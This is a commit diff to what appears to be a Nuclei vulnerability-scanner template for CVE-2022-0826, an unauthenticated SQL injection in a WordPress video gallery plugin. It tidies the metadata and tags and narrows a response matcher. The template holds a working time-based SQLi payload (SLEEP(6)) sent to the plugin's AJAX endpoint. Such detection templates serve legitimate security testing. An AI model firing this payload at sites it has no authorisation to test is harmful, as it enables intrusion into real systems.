Update CVE-2022-0826.yaml
parent
10159089ac
commit
bb4f42796f
|
@ -16,8 +16,8 @@ info:
|
||||||
cve-id: CVE-2022-0826
|
cve-id: CVE-2022-0826
|
||||||
cwe-id: CWE-89
|
cwe-id: CWE-89
|
||||||
metadata:
|
metadata:
|
||||||
verified: "true"
|
verified: true
|
||||||
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-video-gallery-free,unauth
|
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-video-gallery-free,unauth
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -28,11 +28,12 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
|
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'duration>=6'
|
- 'duration>=6'
|
||||||
- 'status_code == 200'
|
- 'status_code == 200'
|
||||||
- 'contains(content_type, "text/html")'
|
- 'contains(content_type, "text/html")'
|
||||||
- '(contains(body, "Registred videos :") || contains(body, "duplicate"))'
|
- 'contains(body, "Registred videos :")'
|
||||||
condition: and
|
condition: and
|
Loading…
Reference in New Issue